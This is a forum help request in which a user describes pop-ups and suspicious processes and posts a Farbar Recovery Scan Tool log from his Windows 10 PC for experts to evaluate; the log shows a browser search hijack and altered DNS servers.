Log analysis and evaluation: Trojan, adware or something else? Windows 7

If you have caught a Trojan or keep getting virus warnings, you can post the logs from our diagnostic tools here for evaluation by our experts. To be able to remove viruses and Trojans, the infected system must first be examined: First steps for help. Note that an infected system is not trustworthy and should not be used until the malware has been completely removed.
19.05.2017, 14:04 | #1 |
Trojan, adware or something else?

Hello Trojaner Board, after a lot of googling I came across your site. I have seen that you have already helped quite a few users. I am sure that my computer is infected with something. The most noticeable thing is that various browsers (Firefox and Edge) each try to open countless pop-ups, which are blocked thanks to the ad blocker. The only browser I can halfway surf with is Internet Explorer. I have also noticed that, every now and then, processes that I have not been able to identify so far open in the taskbar for a fraction of a second.

I have already tried Bitdefender. It does keep finding Trojans and removes them. However, the problem has not been resolved so far. I have already done some groundwork and am posting the latest logs from Farbar and Bitdefender. I hope one of you can help me.

Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 14-05-2017
durchgeführt von Dino (Administrator) auf **** (19-05-2017 14:42:00)
Gestartet von D:\Dino\Downloads
Geladene Profile: Dino (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(AMD) C:\Windows\System32\atieclxx.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Microsoft Corporation) C:\Config.Msi\8cb2c81.rbf
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
() C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\HxMail.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\HxTsr.exe
(VS Revo Group) C:\Program Files\VS Revo Group\Revo Uninstaller\RevoUnin.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe"
GroupPolicyScripts-x32: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)

FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-19]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)

Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [4088608 2016-09-21] (Safer-Networking Ltd.) [Datei ist nicht signiert]
S2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [235984 2016-11-24] (Safer-Networking Ltd.) [Datei ist nicht signiert]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-19 14:28 - 2017-05-19 14:42 - 00000000 ____D C:\FRST
2017-05-19 13:51 - 2017-05-19 13:51 - 00000000 ___HD C:\OneDriveTemp
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
